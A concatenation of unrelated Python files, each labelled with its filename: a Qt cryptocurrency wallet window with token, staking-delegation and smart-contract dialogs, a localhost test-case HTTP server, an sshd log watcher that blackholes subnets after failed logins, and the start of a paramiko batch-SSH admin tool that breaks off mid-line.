self.alias_received_signal.disconnect(d.set_alias_color) if self.fx: self.fx.trigger_update() run_hook('close_settings_dialog') if d.need_restart: self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success')) def closeEvent(self, event): # note that closeEvent is NOT called if the user quits with Ctrl-C self.clean_up() event.accept() def clean_up(self): if self._cleaned_up: return self._cleaned_up = True if self.wallet.thread: self.wallet.thread.stop() self.wallet.thread = None util.unregister_callback(self.on_network) self.config.set_key("is_maximized", self.isMaximized()) if not self.isMaximized(): g = self.geometry() self.wallet.db.put("winpos-qt", [g.left(),g.top(), g.width(),g.height()]) self.wallet.db.put("qt-console-history", self.console.history[-50:]) if self.qr_window: self.qr_window.close() self.close_wallet() if self._update_check_thread: self._update_check_thread.exit() self._update_check_thread.wait() if self.tray: self.tray = None self.gui_object.timer.timeout.disconnect(self.timer_actions) self.gui_object.close_window(self) def plugins_dialog(self): self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins')) plugins = self.gui_object.plugins vbox = QVBoxLayout(d) # plugins scroll = QScrollArea() scroll.setEnabled(True) scroll.setWidgetResizable(True) scroll.setMinimumSize(400,250) vbox.addWidget(scroll) w = QWidget() scroll.setWidget(w) w.setMinimumHeight(plugins.count() * 35) grid = QGridLayout() grid.setColumnStretch(0,1) w.setLayout(grid) settings_widgets = {} def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int): widget = settings_widgets.get(name) # type: Optional[QWidget] if widget and not p: # plugin got disabled, rm widget grid.removeWidget(widget) widget.setParent(None) settings_widgets.pop(name) elif widget is None and p and p.requires_settings() and p.is_enabled(): # plugin got enabled, add widget widget = settings_widgets[name] = p.settings_widget(d) grid.addWidget(widget, i, 1) def do_toggle(cb, name, i): p = plugins.toggle(name) cb.setChecked(bool(p)) enable_settings_widget(p, name, i) # note: all enabled plugins will receive this hook: run_hook('init_qt', self.gui_object) for i, descr in enumerate(plugins.descriptions.values()): full_name = descr['__name__'] prefix, _separator, name = full_name.rpartition('.') p = plugins.get(name) if descr.get('registers_keystore'): continue try: cb = QCheckBox(descr['fullname']) plugin_is_loaded = p is not None cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet) or plugin_is_loaded and p.can_user_disable()) cb.setEnabled(cb_enabled) cb.setChecked(plugin_is_loaded and p.is_enabled()) grid.addWidget(cb, i, 0) enable_settings_widget(p, name, i) cb.clicked.connect(partial(do_toggle, cb, name, i)) msg = descr['description'] if descr.get('requires'): msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires'))) grid.addWidget(HelpButton(msg), i, 2) except Exception: self.logger.exception(f"cannot display plugin {name}") grid.setRowStretch(len(plugins.descriptions.values()), 1) vbox.addLayout(Buttons(CloseButton(d))) d.exec_() def cpfp(self, parent_tx: Transaction, new_tx: PartialTransaction) -> None: total_size = parent_tx.estimated_size() + new_tx.estimated_size() parent_txid = parent_tx.txid() assert parent_txid parent_fee = self.wallet.get_tx_fee(parent_txid) if parent_fee is None: self.show_error(_("Can't CPFP: unknown fee for parent transaction.")) return d = WindowModalDialog(self, _('Child Pays for Parent')) vbox = QVBoxLayout(d) msg = ( "A CPFP is a transaction that sends an unconfirmed output back to " "yourself, with a high fee. The goal is to have miners confirm " "the parent transaction in order to get the fee attached to the " "child transaction.") vbox.addWidget(WWLabel(_(msg))) msg2 = ("The proposed fee is computed using your " "fee/kB settings, applied to the total size of both child and " "parent transactions. After you broadcast a CPFP transaction, " "it is normal to see a new unconfirmed transaction in your history.") vbox.addWidget(WWLabel(_(msg2))) grid = QGridLayout() grid.addWidget(QLabel(_('Total size') + ':'), 0, 0) grid.addWidget(QLabel('%d bytes'% total_size), 0, 1) max_fee = new_tx.output_value() grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0) grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1) output_amount = QLabel('') grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0) grid.addWidget(output_amount, 2, 1) fee_e = BTCAmountEdit(self.get_decimal_point) # FIXME with dyn fees, without estimates, there are all kinds of crashes here combined_fee = QLabel('') combined_feerate = QLabel('') def on_fee_edit(x): fee_for_child = fee_e.get_amount() if fee_for_child is None: return out_amt = max_fee - fee_for_child out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else '' output_amount.setText(out_amt_str) comb_fee = parent_fee + fee_for_child comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else '' combined_fee.setText(comb_fee_str) comb_feerate = comb_fee / total_size * 1000 comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else '' combined_feerate.setText(comb_feerate_str) fee_e.textChanged.connect(on_fee_edit) def get_child_fee_from_total_feerate(fee_per_kb): fee = fee_per_kb * total_size / 1000 - parent_fee fee = min(max_fee, fee) fee = max(total_size, fee) # pay at least 1 sat/byte for combined size return fee suggested_feerate = self.config.fee_per_kb() if suggested_feerate is None: self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''') return fee = get_child_fee_from_total_feerate(suggested_feerate) fee_e.setAmount(fee) grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0) grid.addWidget(fee_e, 3, 1) def on_rate(dyn, pos, fee_rate): fee = get_child_fee_from_total_feerate(fee_rate) fee_e.setAmount(fee) fee_slider = FeeSlider(self, self.config, on_rate) fee_combo = FeeComboBox(fee_slider) fee_slider.update() grid.addWidget(fee_slider, 4, 1) grid.addWidget(fee_combo, 4, 2) grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0) grid.addWidget(combined_fee, 5, 1) grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0) grid.addWidget(combined_feerate, 6, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return fee = fee_e.get_amount() if fee is None: return # fee left empty, treat is as "cancel" if fee > max_fee: self.show_error(_('Max fee exceeded')) return new_tx = self.wallet.cpfp(parent_tx, fee) new_tx.set_rbf(True) self.show_transaction(new_tx) def bump_fee_dialog(self, tx: Transaction): txid = tx.txid() assert txid fee = self.wallet.get_tx_fee(txid) if fee is None: self.show_error(_("Can't bump fee: unknown fee for original transaction.")) return tx_label = self.wallet.get_label_for_txid(txid) tx_size = tx.estimated_size() old_fee_rate = fee / tx_size # sat/vbyte d = WindowModalDialog(self, _('Bump Fee')) vbox = QVBoxLayout(d) vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool."))) grid = QGridLayout() grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0) grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1) grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0) grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1) grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0) def on_textedit_rate(): fee_slider.deactivate() feerate_e = FeerateEdit(lambda: 0) feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1)) feerate_e.textEdited.connect(on_textedit_rate) grid.addWidget(feerate_e, 2, 1) def on_slider_rate(dyn, pos, fee_rate): fee_slider.activate() if fee_rate is not None: feerate_e.setAmount(fee_rate / 1000) fee_slider = FeeSlider(self, self.config, on_slider_rate) fee_combo = FeeComboBox(fee_slider) fee_slider.deactivate() grid.addWidget(fee_slider, 3, 1) grid.addWidget(fee_combo, 3, 2) vbox.addLayout(grid) cb = QCheckBox(_('Final')) vbox.addWidget(cb) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return is_final = cb.isChecked() new_fee_rate = feerate_e.get_amount() try: new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, coins=self.get_coins()) except CannotBumpFee as e: self.show_error(str(e)) return if is_final: new_tx.set_rbf(False) self.show_transaction(new_tx, tx_desc=tx_label) def dscancel_dialog(self, tx: Transaction): txid = tx.txid() assert txid fee = self.wallet.get_tx_fee(txid) if fee is None: self.show_error(_('Cannot cancel transaction') + ': ' + _('unknown fee for original transaction')) return tx_size = tx.estimated_size() old_fee_rate = fee / tx_size # sat/vbyte d = WindowModalDialog(self, _('Cancel transaction')) vbox = QVBoxLayout(d) vbox.addWidget(WWLabel(_("Cancel an unconfirmed RBF transaction by double-spending " "its inputs back to your wallet with a higher fee."))) grid = QGridLayout() grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0) grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1) grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0) grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1) grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0) def on_textedit_rate(): fee_slider.deactivate() feerate_e = FeerateEdit(lambda: 0) feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1)) feerate_e.textEdited.connect(on_textedit_rate) grid.addWidget(feerate_e, 2, 1) def on_slider_rate(dyn, pos, fee_rate): fee_slider.activate() if fee_rate is not None: feerate_e.setAmount(fee_rate / 1000) fee_slider = FeeSlider(self, self.config, on_slider_rate) fee_combo = FeeComboBox(fee_slider) fee_slider.deactivate() grid.addWidget(fee_slider, 3, 1) grid.addWidget(fee_combo, 3, 2) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return new_fee_rate = feerate_e.get_amount() try: new_tx = self.wallet.dscancel(tx=tx, new_fee_rate=new_fee_rate) except CannotDoubleSpendTx as e: self.show_error(str(e)) return self.show_transaction(new_tx) def save_transaction_into_wallet(self, tx: Transaction): win = self.top_level_window() try: if not self.wallet.add_transaction(tx): win.show_error(_("Transaction could not be saved.") + "\n" + _("It conflicts with current history.")) return False except AddTransactionException as e: win.show_error(e) return False else: self.wallet.save_db() # need to update at least: history_list, utxo_list, address_list self.need_update.set() msg = (_("Transaction added to wallet history.") + '\n\n' + _("Note: this is an offline transaction, if you want the network " "to see it, you need to broadcast it.")) win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg) return True def show_cert_mismatch_error(self): if self.showing_cert_mismatch_error: return self.showing_cert_mismatch_error = True self.show_critical(title=_("Certificate mismatch"), msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" + _("Electrum will now exit.")) self.showing_cert_mismatch_error = False self.close() def disable_opsender(self) -> bool: return self.config.get("disable_opsender", True) or \ self.network.get_server_height() <= constants.net.QIP5_FORK_HEIGHT def set_token(self, token: 'Token'): self.wallet.add_token(token) self.token_balance_list.update() self.token_hist_list.update() self.token_hist_model.refresh('set_token') def delete_token(self, key: str): token_name = self.wallet.db.get_token(key).name if not self.question(_("Remove {} from your token list ?") .format(token_name)): return self.wallet.delete_token(key) self.token_balance_list.update() self.token_hist_model.refresh('delete_token') def create_tokens_tab(self): from .token_list import TokenBalanceList, TokenHistoryModel, TokenHistoryList self.token_balance_list = tbl = TokenBalanceList(self) self.token_hist_model = TokenHistoryModel(self) self.token_hist_list = thl = TokenHistoryList(self, self.token_hist_model) self.token_hist_model.set_view(self.token_hist_list) splitter = QSplitter(self) splitter.addWidget(tbl) splitter.addWidget(thl) splitter.setOrientation(Qt.Vertical) return splitter def token_add_dialog(self): if isinstance(self.wallet.keystore, TrezorKeyStore): self.show_message('Trezor does not support QRC20 Token for now') return d = TokenAddDialog(self) d.show() def token_info_dialog(self, token: 'Token'): d = TokenInfoDialog(self, token) d.show() def token_send_dialog(self, token: 'Token'): d = TokenSendDialog(self, token) d.show() def do_token_pay(self, token: 'Token', pay_to: str, amount: int, gas_limit: int, gas_price: int, dialog, preview=False): try: datahex = 'a9059cbb{}{:064x}'.format(pay_to.zfill(64), amount) op_sender = None if self.disable_opsender() else token.bind_addr script = contract_script(gas_limit, gas_price, datahex, token.contract_addr, opcodes.OP_CALL, op_sender) outputs = [PartialTxOutput(scriptpubkey=script, value=0)] tx_desc = _('Pay out {} {}').format(amount / (10 ** token.decimals), token.symbol) self._smart_contract_broadcast(outputs, tx_desc, gas_limit * gas_price, token.bind_addr, dialog, None, preview) except (BaseException,) as e: traceback.print_exc(file=sys.stderr) dialog.show_message(str(e)) def set_delegation(self, dele: 'Delegation'): self.wallet.add_delegation(dele) self.delegation_list.update() def delete_delegation(self, addr: str): self.wallet.delete_delegation(addr) self.delegation_list.update() def call_add_delegation(self, addr: str, staker: str, fee: int, gas_limit: int, gas_price: int, dialog, pod: Optional[bytes]): """ :param staker: hash160 str """ password = None if self.wallet.has_keystore_encryption(): password = self.password_dialog(_("Enter your password to proceed")) if not password: return if not pod: pod = self.wallet.sign_message(addr, staker, password) if len(pod) != 65: raise Exception("incorrect POD length") args = [staker.lower(), fee, pod] self.sendto_smart_contract(DELEGATION_CONTRACT, DELEGATE_ABI[1], args, gas_limit, gas_price, 0, addr, dialog, False, tx_desc="update delegation") def call_remove_delegation(self, addr: str, gas_limit: int, gas_price: int, dialog): self.sendto_smart_contract(DELEGATION_CONTRACT, DELEGATE_ABI[0], [], gas_limit, gas_price, 0, addr, dialog, False, tx_desc="remove delegation") def create_delegations_tab(self): from .delegation_list import DelegationList self.delegation_list = l = DelegationList(self) return self.create_list_tab(l) def delegation_dialog(self, dele: 'Delegation' = None, mode='add'): if isinstance(self.wallet.keystore, TrezorKeyStore): self.show_message('Trezor does not support staking delegation for now') return if self.network.get_server_height() < constants.net.OFFLINE_STAKE_HEIGHT: self.show_message('Offline staking not activated') return d = DelegationDialog(self, dele, mode) d.show() def _smart_contract_broadcast(self, outputs: list, desc: str, gas_fee: int, sender: str, dialog, broadcast_done=None, preview=False): addr_type, __ = b58_address_to_hash160(sender) if not addr_type == constants.net.ADDRTYPE_P2PKH: dialog.show_message(_('only P2PKH address can call contract')) return coins = self.get_coins() make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(coins=coins, outputs=outputs, fee=fee_est, change_addr=sender, gas_fee=gas_fee, sender=sender, is_sweep=False) output_values = [x.value for x in outputs] if output_values.count('!') > 1: self.show_error(_("More than one output set to spend max")) return output_value = '!' if '!' in output_values else sum(output_values) try: d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=False, gas_fee=gas_fee) except SenderNoUTXOException as e: self.show_error(str(e)) return if d.not_enough_funds: # Check if we had enough funds excluding fees, # if so, still provide opportunity to set lower fees. if not d.have_enough_funds_assuming_zero_fees(): self.show_message(_('Not Enough Funds')) return # shortcut to advanced preview (after "enough funds" check!) if preview or self.config.get('advanced_preview'): self.preview_tx_dialog(make_tx=make_tx) return cancelled, is_send, password, tx = d.run() if cancelled: return if tx is None: self.show_message(_('transaction is None')) return if is_send: def sign_done(success): if success: self.broadcast_or_show(tx, broadcast_done=broadcast_done) if desc is not None: self.wallet.set_label(tx.txid(), desc) self.sign_tx_with_password(tx, callback=sign_done, password=password) else: self.preview_tx_dialog(make_tx=make_tx) def create_smart_contract_tab(self): from .smart_contract_list import SmartContractList self.smart_contract_list = l = SmartContractList(self) return self.create_list_tab(l) def set_smart_contract(self, name: str, address: str, interface: list) -> bool: if not is_hash160(address): self.show_error(_('Invalid Address')) self.smart_contract_list.update() return False self.wallet.db.smart_contracts[address] = (name, interface) self.smart_contract_list.update() return True def delete_samart_contact(self, address: str) -> bool: if not self.question(_("Remove {} from your list of smart contracts?".format( self.wallet.db.smart_contracts[address][0]))): return False self.wallet.db.smart_contracts.pop(address) self.smart_contract_list.update() return True def call_smart_contract(self, address: str, func: dict, args: list, sender: str, dialog): data = eth_abi_encode(func, args) try: result = self.network.run_from_another_thread(self.network.call_contract(address, data, sender)) except BaseException as e: self.logger.exception('') dialog.show_message(str(e)) return types = list([x['type'] for x in func.get('outputs', [])]) try: if isinstance(result, dict): except_msg = result.get('executionResult', {}).get('exceptedMessage', '') if len(except_msg) > 1: dialog.show_message(f"exceptedMessage: {except_msg}") return output = eth_abi.decode_abi(types, binascii.a2b_hex(result['executionResult']['output'])) else: output = eth_abi.decode_abi(types, binascii.a2b_hex(result)) def decode_x(x): if isinstance(x, bytes): try: return x.decode() except UnicodeDecodeError: return str(x) return str(x) output = ','.join([decode_x(x) for x in output]) dialog.show_message(output) except (BaseException,) as e: self.logger.exception('') dialog.show_message(f'{e} {result}') def sendto_smart_contract(self, address: str, func: dict, args: list, gas_limit: int, gas_price: int, amount: int, sender: str, dialog, preview, tx_desc=None): try: abi_encoded = eth_abi_encode(func, args) op_sender = None if self.disable_opsender() else sender script = contract_script(gas_limit, gas_price, abi_encoded, address, opcodes.OP_CALL, op_sender) outputs = [PartialTxOutput(scriptpubkey=script, value=amount)] if tx_desc is None: tx_desc = 'contract sendto {}'.format(self.wallet.db.smart_contracts.get(address, [address, ])[0]) self._smart_contract_broadcast(outputs, tx_desc, gas_limit * gas_price, sender, dialog, None, preview) except (BaseException,) as e: self.logger.exception('') dialog.show_message(str(e)) def create_smart_contract(self, name: str, bytecode: str, abi: list, constructor: dict, args: list, gas_limit: int, gas_price: int, sender: str, dialog, preview): def broadcast_done(tx): s = tx.outputs()[0].scriptpubkey if decode_opcreate_script(s) or decode_opsender_script(s): reversed_txid = binascii.a2b_hex(tx.txid())[::-1] output_index = b'\x00\x00\x00\x00' contract_addr = hash_160(reversed_txid + output_index).hex() self.set_smart_contract(name, contract_addr, abi) else: self.logger.debug("the smart contract created seems to be invalid") try: abi_encoded = '' if constructor: abi_encoded = eth_abi_encode(constructor, args) op_sender = None if self.disable_opsender() else sender script = contract_script(gas_limit, gas_price, bytecode + abi_encoded, None, opcodes.OP_CREATE, op_sender) outputs = [PartialTxOutput(scriptpubkey=script, value=0)] self._smart_contract_broadcast(outputs, 'create contract {}'.format(name), gas_limit * gas_price, sender, dialog, broadcast_done, preview) except (BaseException,) as e: self.logger.exception('') dialog.show_message(str(e)) def contract_create_dialog(self): d = ContractCreateDialog(self) d.show() def contract_add_dialog(self): d = ContractEditDialog(self) d.show() def contract_edit_dialog(self, address: str): name, interface = self.wallet.db.smart_contracts[address] contract = { 'name': name, 'interface': interface, 'address': address } d = ContractEditDialog(self, contract) d.show() def contract_func_dialog(self, address: str): name, interface = self.wallet.db.smart_contracts[address] contract = { 'name': name, 'interface': interface, 'address': address } d = ContractFuncDialog(self, contract) d.show()
http_server.py
# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Runs http(s) server in the background.""" from future import standard_library standard_library.install_aliases() import http.server import mimetypes import os import socket import threading from system import environment def get_absolute_testcase_file(request_path): """Search the input directory and additional paths for the requested file.""" # Gather the list of search path directories. current_working_directory = os.getcwd() data_directory = environment.get_value('FUZZ_DATA') input_directory = environment.get_value('INPUT_DIR') fuzzer_directory = environment.get_value('FUZZERS_DIR') layout_tests_directory = os.path.join(data_directory, 'LayoutTests') layout_tests_http_tests_directory = os.path.join(layout_tests_directory, 'http', 'tests') layout_tests_wpt_tests_directory = os.path.join(layout_tests_directory, 'external', 'wpt') # TODO(mbarbella): Add support for aliasing and directories from # https://cs.chromium.org/chromium/src/third_party/blink/tools/blinkpy/web_tests/servers/apache_http.py?q=apache_http.py&sq=package:chromium&dr&l=60 # Check all search paths for the requested file. search_paths = [ current_working_directory, fuzzer_directory, input_directory, layout_tests_directory, layout_tests_http_tests_directory, layout_tests_wpt_tests_directory, ] for search_path in search_paths: base_string = search_path + os.path.sep path = request_path.lstrip('/') if not path or path.endswith('/'): path += 'index.html' absolute_path = os.path.abspath(os.path.join(search_path, path)) if (absolute_path.startswith(base_string) and os.path.exists(absolute_path) and not os.path.isdir(absolute_path)): return absolute_path return None def guess_mime_type(filename): """Guess mime type based of file extension.""" if not mimetypes.inited: mimetypes.init() return mimetypes.guess_type(filename)[0] class BotHTTPServer(http.server.HTTPServer): """Host the bot's test case directories over HTTP.""" def __init__(self, server_address, handler_class): http.server.HTTPServer.__init__(self, server_address, handler_class) def _handle_request_noblock(self): """Process a single http request.""" try: request, client_address = self.get_request() except socket.error: return if self.verify_request(request, client_address): try: self.process_request(request, client_address) except: self.close_request(request) class RequestHandler(http.server.BaseHTTPRequestHandler): """Handler for get requests to test cases.""" def do_GET(self): # pylint: disable=invalid-name """Handle a GET request.""" absolute_path = get_absolute_testcase_file(self.path) if not absolute_path: self.send_response(404) self.end_headers() return try: with open(absolute_path) as file_handle: data = file_handle.read() except IOError: self.send_response(403) self.end_headers() return self.send_response(200, 'OK') # Send a content type header if applicable. mime_type = guess_mime_type(absolute_path) if mime_type: self.send_header('Content-type', mime_type) self.end_headers() self.wfile.write(data) def log_message(self, fmt, *args): # pylint: disable=arguments-differ """Do not output a log entry to stderr for every request made.""" def run_server(host, port): """Run the HTTP server on the given port.""" httpd = BotHTTPServer((host, port), RequestHandler) httpd.serve_forever() def port_is_open(host, port): socket_handle = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = socket_handle.connect_ex((host, port)) socket_handle.close() return result == 0 def start_server_thread(host, port): server = threading.Thread(target=run_server, args=(host, port)) server.daemon = True server.start() def start(): """Initialize the HTTP server on the specified ports.""" http_host = 'localhost' http_port_1 = environment.get_value('HTTP_PORT_1', 8000) http_port_2 = environment.get_value('HTTP_PORT_2', 8080) if not port_is_open(http_host, http_port_1): start_server_thread(http_host, http_port_1) if not port_is_open(http_host, http_port_2): start_server_thread(http_host, http_port_2)
main.py
#!/usr/bin/python # "tail" based on http://stackoverflow.com/a/12523302 # "2>/dev/null" based on http://stackoverflow.com/a/11269627 import threading, Queue, subprocess, re, os, signal, sys tailq = Queue.Queue(maxsize=10) state = [] class Subnet(object): cidr = '0.0.0.0/0' binary = '0' * 32 size = 0 def __init__(self, cidr): # self.cidr = cidr self.binary = Subnet.bits(cidr.split('/')[0]) self.size = int(cidr.split('/')[1]) # normalize, ex. 10/8 to 10.0.0.0/8 self.cidr = Subnet.bin2cidr(self.binary, self.size) def __repr__(self): return '<Subnet %s>' % self.cidr def __cmp__(self, other): return other.size - self.size def __eq__(self, other): return self.cidr == other.cidr def contains(self, other): if self <= other: return False return self.binary[:self.size] == other.binary[:self.size] @classmethod def bin2char(cls, b): c = 0 b = b[::-1] for i in range(8): c += (2 ** i) if b[i] == '1' else 0 return c @classmethod def bin2cidr(cls, b, p): r = [] for i in range(4): r.append(str(Subnet.bin2char(b[i * 8:i * 8 + 8]))) return '%s/%d' % ('.'.join(r), p) @classmethod def bits(cls, ipaddr): n = 0 r = [] for s in ipaddr.split('.'): r.append('{:08b}'.format(int(s))) return ''.join(r).ljust(32, '0') @classmethod def from_range(cls, lo, hi): blo = Subnet.bits(lo) bhi = Subnet.bits(hi) p = 0 for i in range(32): if blo[i] == bhi[i]: p += 1 else: break s = blo[0:p] + ('0' * 32) return cls(Subnet.bin2cidr(s, p)) @classmethod def from_ipaddr(cls, ipaddr): return cls('%s/32' % ipaddr) class Block(object): subnet = None left = 0 engaged = False def __repr__(self): return '[%s Block %s]' % \ ('Engaged' if self.engaged else 'Pending', self.subnet) def __init__(self, subnet, left=1): self.subnet = subnet self.left = left self.strike() def __eq__(self, other): return self.subnet == other.subnet def strike(self): if self.engaged: return self.left -= 1 print ' %s: %d left' % (self, self.left) if self.left <= 0: self.engage() def __del__(self): if self.engaged: self.iproute(['delete', 'blackhole', self.subnet.cidr]) def engage(self): self.iproute(['add', 'blackhole', self.subnet.cidr]) self.engaged = True print ' %s' % self def iproute(self, cmd=[]): cmd = ['ip', 'route'] + cmd print ' calling: %s' % ' '.join(cmd) try: with open(os.devnull, 'wb') as devnull: subprocess.call(cmd, stderr=devnull) except Exception, e: print e def whois(refer, ipaddr): lines = '' new_refer = False subnets = [] try: lines = subprocess.check_output(['/usr/bin/whois', '-h', refer, ipaddr], stderr=subprocess.STDOUT) except subprocess.CalledProcessError, e: lines = e.output for line in lines.split('\n'): line = line.lower() if line.startswith('refer:'): m = re.findall(r'[^:\t\ ]+$', line) if m: new_refer = m[0] if line.startswith('inetnum:') or line.startswith('cidr'): m = re.findall(r'[\d\.]+\/\d{1,2}', line) if m: for cidr in m: subnets.append(Subnet(cidr)) else: m = re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', line) if len(m) == 2: subnets.append(Subnet.from_range(m[0], m[1])) if new_refer: return whois(new_refer, ipaddr) else: return subnets def blackhole(ipaddr): global state subnets = whois('whois.iana.org', ipaddr) single = Subnet.from_ipaddr(ipaddr) skip = False for b in state: if b.subnet.contains(single) and b.engaged: skip = True print ' %s contains %s' % (b, single) elif b.subnet == single and b.engaged: skip = True print ' %s exists' % b if not skip: state.append(Block(single)) if subnets: s = min(subnets) nb = next((ib for ib in state if ib.subnet == s), None) if nb: nb.strike() if nb.engaged: for b in state: if b != nb and nb.subnet.contains(b.subnet): print ' consolidating %s' % b state.remove(b) else: state.append(Block(s, left=3)) def tail_forever(): try: p = subprocess.Popen( ["/usr/bin/journalctl", "-D", "/var/log/journal", "_COMM=sshd", "-o", "cat", "-f", "-n", "100"], stdout=subprocess.PIPE) while True: line = p.stdout.readline() tailq.put(line) if not line: break finally: p.terminate() def sigterm_handler(sig, frame): sys.exit() signal.signal(signal.SIGTERM, sigterm_handler) th = threading.Thread(target=tail_forever) th.start() try: while True: line = tailq.get() m = re.match('Invalid user .* from ([0-9\.]*)', line) \ or re.match('User .* from ([0-9\.]*) not allowed', line) \ or re.match('Received disconnect from ([0-9\.]*):.*\[preauth\]', line) \ or re.match('Failed password for .* from ([0-9\.]*) port [0-9]+ ssh2', line) \ or re.match('Did not receive identification string from ([0-9\.]*)', line) \ or re.match('Unable to negotiate with ([0-9\.]*)', line) if m: ipaddr = m.group(1) print print ipaddr blackhole(ipaddr) except Exception, e: print e finally: print print 'cleaning up' while True: try: b = state.pop() del b except: break th.join()
LazyManage.py
#!/usr/bin/python #encoding:utf8 #LzayManage.py #config file: serverlist.conf #By:peter.li #2014-01-07 #LazyManage.py version update address: #http://pan.baidu.com/s/1sjsFrmX #https://github.com/liquanzhou/ops_doc import paramiko import multiprocessing import sys,os,time,socket,re def Ssh_Cmd(host_ip,Cmd,user_name,user_pwd,port=22): s = paramiko.SSHClient() s.load_system_host_keys() s.set_missing_host_key_policy(paramiko.AutoAddPolicy()) s.connect(hostname=host_ip,port=port,username=user_name,password=user_pwd) stdin,stdout,stderr = s.exec_command(Cmd) Result = '%s%s' %(stdout.read(),stderr.read()) q.put('successful') s.close() return Result.strip() def Ssh_Su_Cmd(host_ip,Cmd,user_name,user_pwd,root_name,root_pwd,port=22): s = paramiko.SSHClient() s.load_system_host_keys() s.set_missing_host_key_policy(paramiko.AutoAddPolicy()) s.connect(hostname=host_ip,port=port,username=user_name,password=user_pwd) ssh = s.invoke_shell() time.sleep(0.1) ssh.send('su - %s\n' %(root_name)) buff = '' while not buff.endswith('Password: '): resp = ssh.recv(9999) buff +=resp ssh.send('%s\n' %(root_pwd)) buff = '' while True: resp = ssh.recv(9999) buff +=resp if ': incorrect password' in buff: su_correct='passwd_error' break elif buff.endswith('# '): su_correct='passwd_correct' break if su_correct == 'passwd_correct': ssh.send('%s\n' %(Cmd)) buff = '' while True: resp = ssh.recv(9999) if resp.endswith('# '): buff +=re.sub('\[.*@.*\]# $','',resp) break buff +=resp Result = buff.lstrip('%s' %(Cmd)) q.put('successful') elif su_correct == 'passwd_error': Result = "\033[31mroot密码错误\033[m" s.close() return Result.strip() def Send_File(host_ip,PathList,user_name,user_pwd,Remote='/tmp',port=22): s=paramiko.Transport((host_ip,port)) s.connect(username=user_name,password=user_pwd) sftp=paramiko.SFTPClient.from_transport(s) for InputPath in PathList: LocalPath = re.sub('^\./','',InputPath.rstrip('/')) RemotePath = '%s/%s' %( Remote , os.path.basename( LocalPath )) try: sftp.rmdir(RemotePath) except: pass try: sftp.remove(RemotePath) except: pass if os.path.isdir(LocalPath): sftp.mkdir(RemotePath) for path,dirs,files in os.walk(LocalPath): for dir in dirs: dir_path = os.path.join(path,dir) sftp.mkdir('%s/%s' %(RemotePath,re.sub('^%s/' %LocalPath,'',dir_path))) for file in files: file_path = os.path.join(path,file) sftp.put( file_path,'%s/%s' %(RemotePath,re.sub('^%s/' %LocalPath,'',file_path))) else: sftp.put(LocalPath,RemotePath) q.put('successful') sftp.close() s.close() Result = '%s \033[32m传送完成\033[m' % PathList return Result def Ssh(host_ip,Operation,user_name,user_pwd,root_name,root_pwd,Cmd=None,PathList=None,port=22): msg = "\033[32m-----------Result:%s----------\033[m" % host_ip try: if Operation == 'Ssh_Cmd': Result = Ssh_Cmd(host_ip=host_ip,Cmd=Cmd,user_name=user_name,user_pwd=user_pwd,port=port) elif Operation == 'Ssh_Su_Cmd': Result = Ssh_Su_Cmd(host_ip=host_ip,Cmd=Cmd,user_name=user_name,user_pwd=user_pwd,root_name=root_name,root_pwd=root_pwd,port=port) elif Operation == 'Ssh_Script': Send_File(host_ip=host_ip,PathList=PathList,user_name=user_name,user_pwd=user_pwd,port=port) Script_Head = open(PathList[0]).readline().strip() LocalPath = re.sub('^\./','',PathList[0].rstrip('/')) Cmd = '%s /tmp/%s' %( re.sub('^#!','',Script_Head), os.path.basename( LocalPath )) Result = Ssh_Cmd(host_ip=host_ip,Cmd=Cmd,user_name=user_name,user_pwd=user_pwd,port=port) elif Operation == 'Ssh_Su_Script': Send_File(host_ip=host_ip,PathList=PathList,user_name=user_name,user_pwd=user_pwd,port=port) Script_Head = open(PathList[0]).readline().strip() LocalPath = 